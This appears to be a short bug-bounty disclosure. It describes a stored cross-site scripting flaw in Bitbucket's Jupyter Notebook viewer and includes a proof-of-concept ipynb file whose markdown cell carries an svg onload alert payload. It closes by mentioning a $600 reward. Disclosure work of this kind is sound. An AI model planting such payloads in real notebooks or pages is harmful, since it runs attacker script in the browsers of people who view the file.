One day, I found that could render Jupyter Notebook on bitbucket.
I have found the Jupyter Notebook(ipynb)’s XSS on GitLab. So, I searched for bitbucket thought that it had a similar vulnerability.

Gitlab XSS via ipynb

Let me get straight to the point, I found Jupyter Notebook’s XSS just like GitLab.

PoC

ipynb content is JSON, When markdown is specified for cell_type, HTML renders Markdown text included in source.

The ipynb for such would look something like this.

{
  "cells": [
    {
      "cell_type": "markdown",
      "metadata": {},
      "source": [
        "# This is Markdown Text",
        "<svg/onload=alert(document.origin)>"
      ]
    }
  ],
  "metadata": {
    "kernelspec": {
      "display_name": "Python 3",
      "language": "python",
      "name": "python3"
    },
    ...
  }
}

Push this ipynb file to the repositry, the script was executed just by viewing the ipynb with the Note Viewer.

alert on bitbucket

Bitbucket rewarded me with $600.
Thanks Atlassian! 😎

Timeline